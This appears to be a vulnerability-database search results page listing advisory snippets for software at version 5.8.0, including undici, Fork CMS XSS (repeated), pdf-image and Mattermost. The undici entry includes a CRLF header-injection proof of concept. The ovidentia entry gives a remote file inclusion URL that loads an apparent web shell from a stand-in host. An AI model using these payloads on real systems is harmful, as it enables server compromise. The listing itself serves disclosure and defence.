12 matches found
Trivision NC227WF security vulnerability
Trivision NC227WF is a webcam from Trivision. A security vulnerability exists in Trivision NC227WF version v5.8.0, which stems from a password being transmitted via a query string...
CVE-2024-45835
Mattermost Desktop App versions =5.8.0 fail to sufficiently configure Electron Fuses which allows an attacker to gather Chromium cookies or abuse other misconfigurations via remote/local access...
flightaware security vulnerability
flightaware is a software application. It is used for flight tracking and data processing. A security vulnerability exists in flightaware version v.5.8.0, which originates from an unauthorized application causing a persistent denial of service by manipulating database files...
undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
Impact: Authorization headers are already cleared on cross-origin redirect in https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872. However, cookie headers, which are sensitive headers and are official headers found in the spec...
undici before v5.8.0 vulnerable to CRLF injection in request headers
Impact: It is possible to inject CRLF sequences into request headers in Undici. const undici = require('undici'); const response = undici.request("http://127.0.0.1:1000", { headers: { 'a': "\r\nb" } }) The same applies to path and method. Patches: Update to v5.8.0. Workarounds: Sanitize all HTTP headers from...
Cross-site scripting in forkcms
Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the Displayname field when using the 'Add', 'Edit' or 'Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML...
CVE-2020-23049
Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the Displayname field when using the 'Add', 'Edit' or 'Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML...
Cross site scripting
Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the Displayname field when using the 'Add', 'Edit' or 'Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML...
CVE-2020-23049
Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the Displayname field when using the 'Add', 'Edit' or 'Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML...
Fork CMS 5.8.0 Script Insertion
Document Title: =============== Fork CMS v5.8.0 - Multiple Persistent Web Vulnerabilities References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2208 ID 3073: https://github.com/forkcms/forkcms/pull/3073 Release Date: ============= 2020-04-17 Vulnerability...
Node.js third-party modules: Command injection in 'pdf-image'
I would like to report command injection in pdf-image. It allows executing commands on the server. Module: module name: pdf-image, version: 1.0.5, npm page: https://www.npmjs.com/package/pdf-image. Module Description: Provides an interface to convert PDF's pages to png files in Node.js by using...
multiple file inclusion exploits in ovidentia v5.8.0
multiple file inclusion exploits in ovidentia v5.8.0 forum type : ovidentia v5.8.0 bug found by : black-code&sweet-devil team : site-down type : file include exploits : http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com/r57.txt?...